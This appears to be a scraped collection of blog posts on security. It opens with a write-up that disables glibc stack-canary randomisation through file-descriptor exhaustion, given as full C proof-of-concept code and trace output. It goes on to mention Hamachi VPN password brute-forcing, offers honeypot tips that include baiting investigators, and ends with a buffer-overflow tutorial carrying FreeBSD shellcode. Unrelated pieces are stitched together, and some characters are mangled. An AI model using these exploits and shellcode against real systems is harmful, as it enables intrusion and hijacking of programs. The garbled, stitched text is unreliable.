The example described bellow aims in disabling a Linux security countermeasure and possibly of other OSs which implement the same type of protection in a similar way. Note that below I am demonstrating this issue in older kernel/libc versions due to changes in the way that this protection is implemented in newer versions which protects against this.

Environment:
manos@jaunty:~/p/ke$ uname -a
Linux jaunty 2.6.28-11-generic #42-Ubuntu SMP Fri Apr 17 01:57:59 UTC 2009 i686 GNU/Linux

manos@jaunty:~/p/ke$ sudo aptitude show libc6
Package: libc6
State: installed
Automatically installed: no
Version: 2.9-4ubuntu6.3
Priority: required
Section: libs
Maintainer: Ubuntu Core developers
Uncompressed Size: 11.2M
Depends: libgcc1, findutils (>= 4.4.0-2ubuntu2)
Suggests: locales, glibc-doc, libc6-i686
Conflicts: libterm-readline-gnu-perl (< 1.15-2), tzdata (< 2007k-1),
tzdata-etch, nscd (< 2.9)
Replaces: belocs-locales-bin
Provides: glibc-2.9-1
Description: GNU C Library: Shared libraries
Contains the standard libraries that are used by nearly all programs on the
system. This package includes shared versions of the standard C library and the
standard math library, as well as many others.
*This glibc version was purposely picked.

manos@jaunty:~/p/ke$ gcc -v
..
gcc version 4.3.3 (Ubuntu 4.3.3-5ubuntu4)

First lets print out the posted poc code:

#include <sys/socket.h>
#include <sys/un.h>

static int send_fd (int unix_fd, int fd)
{
struct msghdr msgh;
struct cmsghdr *cmsg;
char buf[CMSG_SPACE (sizeof (fd))];
memset (&msgh, 0, sizeof (msgh));


memset (buf, 0, sizeof (buf));

msgh.msg_control = buf;
msgh.msg_controllen = sizeof (buf);

cmsg = CMSG_FIRSTHDR (&msgh);
cmsg->cmsg_len = CMSG_LEN (sizeof (fd));
cmsg->cmsg_level = SOL_SOCKET;


cmsg->cmsg_type = SCM_RIGHTS;

msgh.msg_controllen = cmsg->cmsg_len;

memcpy (CMSG_DATA (cmsg), &fd, sizeof (fd));
return sendmsg (unix_fd, &msgh, 0);
}

int main ()
{

int fd[2], ff[2];

int target;
if (socketpair (PF_UNIX, SOCK_SEQPACKET, 0, fd)==-1)
return 1;
for (;;)
{
if (socketpair (PF_UNIX, SOCK_SEQPACKET, 0, ff)==-1)
return 2;
send_fd (ff[0], fd[0]);
send_fd (ff[0], fd[1]);


close (fd[1]);
close (fd[0]);
fd[0] = ff[0];
fd[1] = ff[1];
}
} 

Next, we are moving to the targeted protection:

file: glibc-2.9/sysdeps/unix/sysv/linux/dl-osinfo.h

..
static inline uintptr_t __attribute__ ((always_inline))
_dl_setup_stack_chk_guard (void)
{
  uintptr_t ret;
#ifdef ENABLE_STACKGUARD_RANDOMIZE
  int fd = __open ("/dev/urandom", O_RDONLY);
  if (fd >= 0)
    {
      ssize_t reslen = __read (fd, &ret, sizeof (ret));
      __close (fd);
      if (reslen == (ssize_t) sizeof (ret))
	return ret;
    }
#endif
  ret = 0;
  unsigned char *p = (unsigned char *) &ret;
  p[sizeof (ret) - 1] = 255;
  p[sizeof (ret) - 2] = '\n';
  return ret;
}  
..

It is pretty obvious what our target is. Just in case you didn’t see it, we want to use our file exhaustion bug and disable the ENABLE_STACKGUARD_RANDOMIZE part of the code and leave only the terminator value (aka ff0a0000) which in certain situations can be overwritten and secure us EIP control.

we want this unreachable :

  if (fd >= 0)
    {
      ssize_t reslen = __read (fd, &ret, sizeof (ret));
      __close (fd);
      if (reslen == (ssize_t) sizeof (ret))
	return ret;
    }

We want fd to return something less than 0. To increase our chances of doing this we are going to modify a little bit our FD exhaustion code :

#include <sys/socket.h>
#include <sys/un.h>         
#include <stdio.h> 
#include <string.h>
#include <stddef.h>   
      
//return file-nr array - exit's when there are not enough File Descriptors     
int* nr()
{
	char line [100]; 
	FILE *filenr;
	if((filenr = fopen("/proc/sys/fs/file-nr", "r")) == NULL){printf("\nOvershoot FDs - exiting\n");exit(0);}   
	fgets ( line, sizeof line, filenr );                                 
	fclose(filenr); 
	int out[3];
	sscanf(line, "%d %d %d", &out[0],&out[1],&out[2]);	
return out;
}   

static int send_fd (int unix_fd, int fd)
{
	  struct msghdr msgh;
	  struct cmsghdr *cmsg;
	  char buf[CMSG_SPACE (sizeof (fd))];
	  memset (&msgh, 0, sizeof (msgh));
	  memset (buf, 0, sizeof (buf));
	  msgh.msg_control = buf;
	  msgh.msg_controllen = sizeof (buf);
	  cmsg = CMSG_FIRSTHDR (&msgh);
	  cmsg->cmsg_len = CMSG_LEN (sizeof (fd));
	  cmsg->cmsg_level = SOL_SOCKET;
	  cmsg->cmsg_type = SCM_RIGHTS;
	  msgh.msg_controllen = cmsg->cmsg_len;
	  memcpy (CMSG_DATA (cmsg), &fd, sizeof (fd));
	  return sendmsg (unix_fd, &msgh, 0);   
}    



int crash_loop(int loop) 
{
	
 int fd[3], ff[3];
 int count=0;

  while (count<loop)                         
  {  
	
	//Set FD lower limit for shooting out Canary          
	int *in = nr();
	int c=in[0],i=in[1],l=in[2]; 

		if (l-c<=80) 
		{
		system("strace -x -e trace=read,open ./m"); 
		}              
		    
    if (socketpair (PF_UNIX, SOCK_SEQPACKET, 0, ff)==-1)
    return 2;  	
    send_fd (ff[0], fd[0]);
    send_fd (ff[0], fd[1]);
    close (fd[1]);
    close (fd[0]);
    fd[0] = ff[0];
    fd[1] = ff[1];                        
	count++;
  }	
}

int main (int argc, char *argv[])
{    
	printf ("Start Exhaustion Loop\n");  

    while (1)
		{  
	    	crash_loop(1);
        	}
} 

What we added is some control over the loop and nr() which probes /proc/sys/fs/file-nr and gets the current used FDs and the system’s FD limit. Then we take this array and we set the lower limit of free file descriptors before attempting to “lock” access to /dev/urandom. Note that since this process is going to be un-killable we want it to stop at the point where we have no other free descriptors, hence we “exit” when we can’t open /proc/sys/fs/file-nr. We execute our victim application using strace, as we want to see all the system calls (e.g. open, read). *Note that the use of usleep might come handy if we want to stabilise our free FDs to a certain number, since the method described below is likely to be used in a waiting stabilising process form rather than executing multiple times our target program as described here.

Now let’s look our victim application :

#include <stdint.h>
#include <stdio.h>


int main(int argc, char *argv[]) 

  	{   //STACK_CHK_GUARD  -  i386    (stackguard-macros.h)    
		uintptr_t x; 
		asm ("movl %%gs:0x14, %0" : "=r" (x));
		fprintf(stderr, "Cookie [%%gs:0x14=%0lx]\n\n",x)    ; 
	}

brk(0) = 0x8b3e000
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb8000000
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY) = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=50808, ...}) = 0
mmap2(NULL, 50808, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7ff3000
close(3) = 0
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 3
read(3, "\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\.."..., 512) = 512
fstat64(3, {st_mode=S_IFREG|0755, st_size=1442180, ...}) = 0
mmap2(NULL, 1451632, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb7e90000
mprotect(0xb7fec000, 4096, PROT_NONE) = 0
mmap2(0xb7fed000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x15c) = 0xb7fed000
mmap2(0xb7ff0000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7ff0000
close(3) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7e8f000
set_thread_area({entry_number:-1 -> 6, base_addr:0xb7e8f6c0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0
open("/dev/urandom", O_RDONLY) = 3
read(3, "\xc9\x6e\xa8"..., 3) = 3
close(3) = 0
mprotect(0xb7fed000, 8192, PROT_READ) = 0
mprotect(0x8049000, 4096, PROT_READ) = 0
mprotect(0xb801f000, 4096, PROT_READ) = 0
munmap(0xb7ff3000, 50808) = 0
write(2, "Cookie [%gs:0x14=a86ec900]\n\n"..., 28Cookie [%gs:0x14=a86ec900]) = 28
exit_group(28) = ?

We can clearly see that :

open("/dev/urandom", O_RDONLY) = 3
read(3, "\xc9\x6e\xa8"..., 3) = 3

and our canary is a86ec900 (little endian + 1 null byte)

Now that we have everything set let’s see what happens when we execute our code:

manos@jaunty:~/p/ke$./pp&
Start Exhaustion Loop
.
.
.
open("/etc/ld.so.cache", O_RDONLY) = 3
open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 3
read(3, "\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x03\x00....., 512) = 512
open("/dev/urandom", O_RDONLY) = 3
read(3, "\x04\xe8\x8e"..., 3) = 3
Cookie [%gs:0x14=8ee80400]
open("/etc/ld.so.cache", O_RDONLY) = 0
open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 0
read(0, "\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x03\x0.."..., 512) = 512
open("/dev/urandom", O_RDONLY) = 0
read(0, "ATX"..., 3) = 3
Cookie [%gs:0x14=58544100]
open("/etc/ld.so.cache", O_RDONLY) = 3
open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 3
read(3, "\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x03.."..., 512) = 512
open("/dev/urandom", O_RDONLY) = -1 ENFILE (Too many open files in system)
Cookie [%gs:0x14=a967000]
Overshoot FDs - exiting

As we can see, after some executions we managed to block ENABLE_STACKGUARD_RANDOMIZE with an ENFILE error and jump straight after the if statement. Clearly we should have seen ff0a0000 here. After some more tries we observe the following canary values (for fd =-1) :

..
0xe8537000
0x1c0d7000
0x146c7000
0xe8b0f000
0x1d487000
0x13d2f000
0x15caf000
0x7c3f000
0xe1b47000
0x6e77000
0xe5a47000
0x1ab7f000
0xf4237000
0x1978f000
0xe584f000
0x5287000
0x18de7000
0xb517000
0x1311f000
0xf1f47000
0x310f000
0xfe0b7000
0xf7ccf000
0xff2ff000
0xf8d07000
0x6e77000
0xf35ef000
0xf0f07000
0xe21af000
0xf1b57000
0xb71f000
0x1c0d7000
0xe9f5f000
0xe832f000
0xe8f1f000
0xed26f000
0xee4b7000
0x83cf000
0xeb1e7000
0xc0c7000
0xf9f4f000
..

Some modification is happening on the terminator canary.

If we get libc6 along with glibc_2.9-4ubuntu6.3.diff and inspect the patch, we see the following lines added within dl-osinfo.h :

+@@ -77,5 +80,31 @@
+   unsigned char *p = (unsigned char *) &ret;
+   p[sizeof (ret) - 1] = 255;
+   p[sizeof (ret) - 2] = '\n';
++#ifdef HP_TIMING_NOW
++  hp_timing_t hpt;
++  HP_TIMING_NOW (hpt);
++  hpt = (hpt & 0xffff) << 8;
++  ret ^= hpt;
++#endif
++  uintptr_t stk;
++  /* Avoid GCC being too smart.  */
++  asm ("" : "=r" (stk) : "r" (p));
++  stk &= 0x7ffff0;
++#if __BYTE_ORDER == __LITTLE_ENDIAN
++  stk <<= (__WORDSIZE - 23);
++#elif __WORDSIZE == 64
++  stk <<= 31;
++#endif
++  ret ^= stk;
++  /* Avoid GCC being too smart.  */
++  p = (unsigned char *) &errno;
++  asm ("" : "=r" (stk) : "r" (p));
++  stk &= 0x7fff00;
++#if __BYTE_ORDER == __LITTLE_ENDIAN
++  stk <<= (__WORDSIZE - 29);
++#else
++  stk >>= 8;
++#endif
++  ret ^= stk;
+   return ret; ;      

This patch is XORing the value of ret (terminator value) with the current CPU tick counter (taken from rdtsc). Then the array’s (p) address is used (as additional entropy) and the rest can be replicated by us, so the patch adds some fair and cheap trickery (poor man’s randomisation) – *while I was writing this post, this was published, which shows that windows kernel mode canary generation is similar to the above.

To make sure that a glibc version without the stack-guard-quick-randomization.diff applied is giving ff0a0000 (even though we can confirm this with strace), we recompile glibc without this patch. This will save us some time of looking around to find a distro without this patch applied (we just comment out all XOR operations).

So lets run pp again :
manos@jaunty:~/p/ke$./pp&
Start Exhaustion Loop
.
.
.
[b80a70d4] open("/etc/ld.so.cache", O_RDONLY) = 0
[b80a70d4] open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 0
[b80a7154] read(0, "\x7f\x45\x4c\x46\x01\x01\x01\x00.."..., 512) = 512
[b80a70d4] open("/dev/urandom", O_RDONLY) = 0
[b80a7154] read(0, "\x17\x7f\x77"..., 3) = 3
Cookie [%gs:0x14=777f1700]
[b7f7e0d4] open("/etc/ld.so.cache", O_RDONLY) = 3
[b7f7e0d4] open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 3
[b7f7e154] read(3, "\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\..."..., 512) = 512
[b7f7e0d4] open("/dev/urandom", O_RDONLY) = 3
[b7f7e154] read(3, "\x70\xec\x1e"..., 3) = 3
Cookie [%gs:0x14=1eec7000]
[b80f10d4] open("/etc/ld.so.cache", O_RDONLY) = 0
[b80f10d4] open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 0
[b80f1154] read(0, "\x7f\x45\x4c\x46\x01\x01\x01\x00\x00..."..., 512) = 512
[b80f10d4] open("/dev/urandom", O_RDONLY) = 0
[b80f1154] read(0, "\x64\x95\xb7"..., 3) = 3
Cookie [%gs:0x14=b7956400]
[b808a0d4] open("/etc/ld.so.cache", O_RDONLY) = 3
[b808a0d4] open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 3
[b808a154] read(3, "\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00..."..., 512) = 512
[b808a0d4] open("/dev/urandom", O_RDONLY) = -1 ENFILE (Too many open files in system)
Cookie [%gs:0x14=ff0a0000]
Overshoot FDs - exiting

We are now certain that a simple File Descriptor exhaustion bug can assist in disabling canary stack randomisation. It is worth mentioning that /dev/urandom was dropped mainly on performance and not security implications of FD hijacking or shortage.

As this post is focused on disabling the ENABLE_STACKGUARD_RANDOMIZE we are not going to analyse ways of guessing/determing stack-guard-quick-randomization.diff entropy points, however going back to the patched version and based solely on visual canary value observations, we can see that we significantly reduced the canary space from 16777215 to almost 65535. rdtsc can be predicted with some decent accuracy in a low/medium usage uniprocessor systems, during non-context switched execution, but we save this for another time.

Below is a simple patch for strace – which prints rdtsc at each “syscal exit” (trace_syscall_exiting) – It is not accurate but it can be used for roughly observing tick jumps

--- syscall.c
+++ syscall.c
@@ -109,7 +109,7 @@
 #define TN TRACE_NETWORK
 #define TP TRACE_PROCESS
 #define TS TRACE_SIGNAL
-
+#define HP_TIMING_NOW(Var)	__asm__ __volatile__ ("rdtsc" : "=A" (Var))
 static const struct sysent sysent0[] = {
 #include "syscallent.h"
 };
@@ -2520,7 +2520,8 @@
 			(long) tv.tv_sec, (long) tv.tv_usec);
 	}
 	printtrailer();
-
+	HP_TIMING_NOW (hpt);
+	tprintf(" rdtsc : %lld   ",hpt );
 	dumpio(tcp);
 	if (fflush(tcp->outf) == EOF)
 		return -1;

The output of strace with the rdtsc out is :
execve("./m", ["./m"], [/* 20 vars */]) = 0
rdtsc : 170812617327520 brk(0) = 0x9a62000
rdtsc : 170812617944640 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
rdtsc : 170812618580380 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb8083000
rdtsc : 170812618926180 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
rdtsc : 170812619351780 open("/etc/ld.so.cache", O_RDONLY) = 3
rdtsc : 170812619758760 fstat64(3, {st_mode=S_IFREG|0644, st_size=50808, ...}) = 0
rdtsc : 170812620131160 mmap2(NULL, 50808, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb8076000
rdtsc : 170812620421100 close(3) = 0
rdtsc : 170812620785520 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
rdtsc : 170812621126000 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 3
rdtsc : 170812621530320 read(3, "\177ELF\1\1\1\3\3\1\320h\1004"..., 512) = 512
rdtsc : 170812621830900 fstat64(3, {st_mode=S_IFREG|0755, st_size=1442180, ...}) = 0
rdtsc : 170812622221920 mmap2(NULL, 1451632, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb7f13000
rdtsc : 170812622559740 mprotect(0xb806f000, 4096, PROT_NONE) = 0
rdtsc : 170812622852340 mmap2(0xb8070000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x15c) = 0xb8070000
rdtsc : 170812623144940 mmap2(0xb8073000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb8073000
rdtsc : 170812623490740 close(3) = 0
rdtsc : 170812623831220 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f12000
rdtsc : 170812624230220 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7f126c0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0
rdtsc : 170812624568040 open("/dev/urandom", O_RDONLY) = 3
rdtsc : 170812624900540 read(3, "\247\33'", 3) = 3
rdtsc : 170812625185160 close(3) = 0
rdtsc : 170812625453820 mprotect(0xb8070000, 8192, PROT_READ) = 0
rdtsc : 170812626110840 mprotect(0x8049000, 4096, PROT_READ) = 0
rdtsc : 170812626430040 mprotect(0xb80a2000, 4096, PROT_READ) = 0
rdtsc : 170812626757220 munmap(0xb8076000, 50808) = 0
rdtsc : 170812627081740 write(2, "\nUSAGE: 1 (print Canary), 2 (ter"..., 52
USAGE: 1 (print Canary), 2 (terminator owerwrite)) = 52
rdtsc : 170812627674920 exit_group(52) = ?


For other possible FD exhaustion targets you can look here.

I didn’t explain some things since they have been discussed before, so if you have unanswered questions have a look below :

This article is kept just for reference. I will try to package the source code and give it as a download at some point.

Anyway, to cut a long story short, utilising jQuery, Google Code Search API and Bugle, I created an automated version of the Bugle project which looks as close as possible to a desktop based source code review tool.

To demonstrate Bugle Automated I will be looking for bugs in Samba. The first step is to add the package you want to inspect in the Scan field, as you can see below there is Auto Complete functionality available suggesting possible packages while you type a name.

After choosing a package, press scan an Bugle will do the rest.

The first screen you see is a bit empty , both the Main Panel and the Stats Panel will load as soon as you choose a vulnerability category from the left side. Bugle displays the number of issues of each category, so you can immediately get an general idea on where you might find a bug.

As soon as you choose a category a sub menu will be revealed, presenting all the different signatures in that category. At the same time the statistics Panel will load and all the relevant graphs for the project/categories and categories/signatures will be displayed.

Next we choose the Buffer Overflows category, with 205 hits and then the Generic BoF signature (with 50 hits). The Main Panel loads and then we can see each individual line with a possible bug. We scroll down until we find something that could be a vulnerability and click on that line.

We click the Line 117 of samba-1.9.15p8.mvs/source/sockspy.c and we inspect the code in the Code Snippet dialog. Then we scroll down until we find the line with the yellow highlighted text

We can see that strcpy(DestHost,argv[1]); is copying the arv[1] into the DestHost buffer which has 256 chars size. Now we can guess that if we pass in the command line DestHost larger than 256 chars we can create a buffer overflow condition. (Note that this bug in sockspy.c is in a very very very old version of Samba)

That’s Bugle Auto Scanner, hopefully this will assist in discovering and fixing bugs out there.

Detect Networks script Detect-hamachi.pl

After that the next step was to see if the system returns a distinctive error if the network picked is correct but the password supplied is wrong. Again that proved to be the case, so the next step was to check on the network I created if there is any account lockout or IP blocking if I submit the wrong password several times. I send the wrong password 10 times and the account was still active. When considering the fact that someone creates a VPN to establish a secure tunnel between private assets this can be considered as an immediate security threat.

At this stage I modified the previous tiny script to go through a list of passwords given a valid network name and the result was predictebale, found the valid password and join the network.

Find valid Hamachi passwords script beef-hamachi.pl

A fast solution to the issue described is to “Block new network members by default”, there is an option in the Security tab to do that.

All of the above are very simple observations, nothing on the protocol or implementation as such (also as far as I am concerned the project is closed source at the moment). Haven’t used it that much so if you see something wrong in here let me know.

These scripts work only in linux and you need to have perl and hamachi installed. Have a look at http://files.hamachi.cc/linux/README on how to install in linux , note in Debian you need to create the /dev/net/tun device to make it work.

mkdir /dev/net/tun
mknod /dev/net/tun c 10 200

Note: The provided scripts are only for illustration purpose, use them only on networks you own.


Reputation
Content


Both of these steps are not difficult to achieve. Reputation: make some public noise about a particular illegal service you provide through your system so an agent will notice it (public noise is not difficult these days, especially via the web).

Content: create some fake ‘illegality’ in your system so it can convince an observer.At this point government knows about the service you provide but since there is not any evidence about you they need to make some analysis of your system/data using forensic techniques, which most likely will be launched remotely. Note that they (government) want to see your system work in real-time so they won’t stop it. Now that the hacker expects to be under investigation the only thing that he has to do is, sit back and watch. The honeypot is been used against government so we can expect it to give us some really interesting feedback. Most likely we would see exploits that haven’t yet published, tools that are in total secrecy, and we might see some techniques to detect the existence of a honeypot.

As we can see, honeypots are tools which can provide good analysis of a particular attack, but we must remember that every publicly available tool can be used by all the people, so the question created is, honeypots help investigators or hackers? The power that a hacker can gain using the previous technique can make him/her almost untouchable; no one would want to hack into his/her system to do investigation since the only thing that they will achieve is to give more knowledge ‘out’.

Honeypots & Worms

Worms are small entities, which spread ‘around’ using well-known vulnerabilities, with a main purpose to intrude inside a system and be able to attack from that host others and spread [http://www.securityfocus.com/infocus/1740]. Worms can ‘Damage’ or do ‘Good’, depended the way you use them. Mostly written by computer hackers and researchers, although many times antivirus companies create them for the obvious reason to make money. In order to find out how a honeypot will be useful against a worm, we need to know the most known characteristic of a network reaction during an attack. When a worm is lunched we can observe aggressive flow of traffic and bandwidth reduction. The first hint that a worm is ‘around’ is observed, now we can watch for a specific steps usually a known worm does, for example, if we have an attempt on port 135 of our system and the particular packet is giving known signatures of MSBlast we can be sure what is going on and send the worm to a controlled honeypot or honeynet to observe how this worm works and at the same time secure our network from the attack.

The previous example is known as a defender honeypot and is based on gateway, which is acting once as a firewall and then as IDS. We have content analysis, traffic analysis, and source code analysis and port alarms. It is obvious from what we saw above that a system like that can work in case a worm is known and predictable, which in most cases will work, but during the attack of a new and unknown worm a honeypot might do damage instead, and send the worm inside our secure network. This confusion can be caused also from worms which are using encryption and/or polymorphism so it is really difficult for a honeypot to be sure if there is a worm attack or just e.g. a network problem. In a situation like that it is better to use a scheme called Sacrificial Lamb. We have to sacrifice a system in our network and leave the worm infect it. In this system we had previously created virtual hosts (using honeyd for example) in a very simple ‘topology ‘ and big in number, so we could simulate 10.000 hosts, and see how the worm is moving inside that virtual network. 10.000 hosts is probably a good number to identify all the possible signatures of the worm and be able to update our honeypot-gateway/anti virus/firewall or IDS.

Catch information thieves using honeytokens

Some times the concept of honeypot needs to be applied to a specific information or collection of information instead of a system. In order to make this statement more clearly we can use a real life example [http://lwn.net/Articles/40925]. Lets say that you want to check if a service you are using in the internet is selling your personal information to a third party or spammers. The only way to do that is to give them some fault information and be able to confirm them.

An easy way to do that is, by having a different email address for every registering you are doing to different services. First you need to have your own domain name in order to do it easier, then enable email forwarding, so every email address you create under you domain name will send the emails to your main email address.

Let say that we want to open a user account with Amazon.com, during the registration process amazon will ask for a valid email address, this is where we will put our honeytoken , instead of using our main email address we put in this field : amazon.com@mydomain.com.

Now every time we receive an email, which is having as recipient amazon.com@mydomain.com we know that the information came out of amazon.

Another example is the Management’s emails. In this scenario we need to know if someone is trying to have access to a company’s high confidential information, which for example can be transferred via email. In order to achieve that we do the following: We create an email, which is having fake information about a server we are having online and this server is full of top-secret data.

For example:

Dear manager ,

These are the informations about the company's
private server :
Server : TopSecret.company.com
Username : Manager1
Password : Password1

Regards ISDepartment

This email is a real trap, we are sure that if someone will login into the system TopSecret.company.com will be an attacker. Then we can track him/her down easily. As we can see from the previous examples, honeytokens can be really helpful, although this technique is not new, especially in information intelligence world.

Track Spammers with honeypots

One of the biggest problems created using the fundamental tools of web is spamming. It is difficult to catch a spammer since the mailing system itself is not secure enough. Spammers usually use ‘open’ (open relay) mail servers in order to do their attack. Although it is well known problem, many companies and ISPs don’t take any countermeasures to avoid a usage of their servers as a spam tool because they mostly don’t know that is happening, until it is very late and they get blacklisted.

We mentioned earlier Open Relay, this is an option in mail servers, which lets anyone in the Internet use your mail server and deliver emails. Although this service at the beginning of the Internet revolution had a reason of existence, now it seems like the good tool for spammers to deliver their ‘goods’ [http://www.honeypots.net]. The main technique of spammers is to do an IP scanning combined with Service scanners in order to identify any mail servers for a given IP range. The next step is to check the found servers for an Open relay service; the usual way of doing the check is by sending an email to your self, using the server under ‘analysis’. The formal name for these tests is known as Relay Test message [http://www.tracking-hackers.com/solutions/sendmail.html].

Since we know the way that spammers work, we can place a honeypot and make it work as a Relay mail server, when the attacker will find that server, he will send the Relay Test message, now the honeypot knows that there is something wrong, but it will keep work as relay server and will return the relay test message. Now the spammer is sure that the server is open and he will try to lunch spamming attack. Our honeypot will be programmed to pretend that it sends all the emails the spammer delivers, in the meantime we will be able to do a research in the spammers Identity, for example find his IP, Location and ISP. Even if the attacker uses a proxy to do the work, we can track the proxy servers and inform the administrators about the misuse of their system.

This is a general idea on how we can use honeypots against spammers, more practical details on how to do that visit: http://fightrelayspam.homestead.com/files/antispam06132002.htm

To my opinion the first thing you should have is a good tool to help you calculate statistics in the ciphertext , therefore I recommend you : Crank(linux,windows) and CAP(windows)
CAP is more sophisticated , but crank is good as well.

Then you need to have a dictionary with many different word lengths , so you can guess words easier ,the best I’ve found with a categorisation like that is : Wordox Lexikon
To know Letter frequencies in the language your ciphertext is written is very helpfull and is a must.
Note : if you have statistics for other languages please let me know

The following knowledge is been obtained for english language :

Letter frequencies starting from the most frequent :
e ,t ,s ,d ,n ,r ,y
The most common digrams starting from the most frequent :
th ,he ,at ,st ,an ,in ,ea ,nd ,er ,en ,re ,nt ,to ,es ,on ,ed ,is ,ti
The most common Trigraphs starting from the most frequent :
the ,and ,tha ,hat ,ent ,ion ,for ,tio ,has ,edt ,tis ,ers ,res ,ter ,con
,ing ,men ,tho
The most common Doubles starting from the most frequent :
ll ,tt ,ss ,ee ,pp ,oo ,rr ,ff cc ,dd ,nn
The most common words starting from the most frequent :
the ,of ,are ,I ,and ,you ,a ,can ,to ,he ,her ,that ,in ,was ,is ,has
,it ,him ,his

In this article I will try to explain you the basic idea behind it . I am not going into great detail since there are plenty of texts out there doing that, I will just describe how this kind of bug works with a small example.

Note : At the end of this article you will find plenty of texts describing this technique in detail using examples

Every executable file, after we trigger it to run, is going to use some memory. (Remember that) Some memory segments used to store data some other instructions and some other memory pointers.

Imagine the following :

we do : ./tool

next we get that :

Memory for this tool Starts --------------> 0x8048448
BLABLA
0x8048451 call 0x8048440 <f>
BLABLA
BLABLA
Memory for this tool Ends --------------> 0x804845a

As you can see there is a Start and End for every execution , we will pay attention in between , where “tool” is calling some function. If we could change the 0×8048440 to an address we have load our code we could run anything we wanted during the execution of our application.

So , in order to change that address we need to overflow a buffer inside the “tool” . If we overflow it we can point it to our code somewhere else in the memory.

First of all, we need to find when “tool” overflows and cannot accept more data.

Lets imagine that there is a buffer in “tool” : char data[10]; used during the
execution procedure.

Easy to imagine what we need to do to overflow that buffer right ?

1) Create an enviroment : export BUFFER=`perl -e ‘{print “A”x”20″}’`

print "A"x"20" // This prints out the buffer we want to create

// Choose it in a way that a) if you know the buffer size
// try to make it twice as big or b) if you dont know
// The buffer size , create a very big e.g. print "A"x"2000"

2) Send to “tool” data bigger than 10xchar = 80bytes.

It depends on the software you want to exploit e.g

a) if tools take arguments from the command line like that : ./tool arg[0] arg[1] ..

We can pass our buffer doing that : ./tool $BUFFER

b) if tools take arguments like that : ./tool < argument

We can do that : ./tools < $BUFFER

Now you need to see the following error after executing the software, so you can be sure there is a buffer overflow on the spot :

[me@cipher]$ ./tool $BUFFER
Segmentation Fault (Core Dump)

Segmentation Fault means that we overflow the memory and we change the pointer.

If we look with GDB the registers, we will see that the EIP register is
0×41414141. (41 == A in hex.) which means that we change the CALL address to 0×41414141.

If we could overflow “tool” with an address we load our software we can run whatever we wanted.

OK , its a bit difficult to know the address we load our code , so we load our BOF exploit using enviroment , we do that cause we know where the env variables start.

Lets say that the environment variable start at : 0xbffffb54

If we want to pass out code in the buffer of “tool” we need to overflow
“tool” using 0xbffffb54 as argument.

so lets do that :
perl -e '{print "T���"x"20"}' > BUFFER.txt //T��� is the representation of 0xbffffb54

if we do : ./tool < BUFFER.txt , EIP will be 0xbffffb54 so we know it will
execute our code.

lets load a SHELLCODE in the environment and do it all together :

[me@cipher]$export BUFFER=`perl -e '{
print "\xeb\x0e\x5e\x31\xc0\x88\x46\x07\x50\x50
\x56\xb0\x3b\x50\xcd\x80\xe8\xed\xff\xff\xff
\x2f\x62\x69\x6e\x2f\x73\x68\x23"}'`

[me@cipher]$perl -e '{print "T���"x"20"}' > BUFFER.txt
[me@cipher]$./tool < BUFFER.txt
$

SHELLCODEs are different for each OS and architecture. The one above is for FreeBSD.

The BEST Tutorials in BOF

Smashing The Stack For Fun And Profit
BOF with PERL
Stack Smashing Vulnerabilities
l0pht

“When the Greek tyrant Histiaeus was held as a virtual prisoner of king Darius in Susa in the 5th century BCE, he had to send a secret message to his son-in-law Aristagoras to the Anatolian city of Miletus. Histiaeus shaved the head of a slave and tattooed a message on his scalp. When the slave’s hair had grown long enough he was dispatched to Miletus. That’s how Herodotus describes one of the first cases of using steganography in the ancient world, the art of covered writing.”

